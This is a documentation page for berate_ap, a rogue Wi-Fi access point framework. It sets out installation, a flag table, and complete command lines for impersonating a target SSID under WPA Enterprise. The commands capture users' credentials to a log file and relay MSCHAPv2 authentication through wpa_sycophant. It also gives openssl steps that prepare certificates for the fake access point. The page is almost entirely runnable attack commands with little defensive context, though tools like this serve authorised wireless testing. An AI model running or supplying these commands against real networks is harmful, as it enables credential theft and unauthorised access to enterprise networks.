Enterprise & Rogue AP
berate_ap
Rogue AP framework with WPA Enterprise support: integrates with wpa_sycophant for MSCHAPv2 relay attacks and supports custom certificate loading.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Rogue AP framework with WPA Enterprise support: integrates with wpa_sycophant for MSCHAPv2 relay attacks and supports custom certificate loading.
git clone https://github.com/sensepost/berate_ap.git
cd berate_ap
./berate_ap [options] <interface> <bridge_iface> <ssid>
| Flag | Description |
|---|---|
--eap | Enable WPA Enterprise (EAP) mode |
--mana-wpe | Enable credential capture (WPE) |
--wpa-sycophant | Enable wpa_sycophant relay integration |
--mana-credout <file> | Write captured credentials to file |
--eap-cert-path <dir> | Load custom TLS certificates from directory |
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
wlan1 lo <TARGET-SSID>
openssl x509 -in ca.crt -out hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
--eap-cert-path /path/to/certs/ \
wlan1 lo <TARGET-SSID>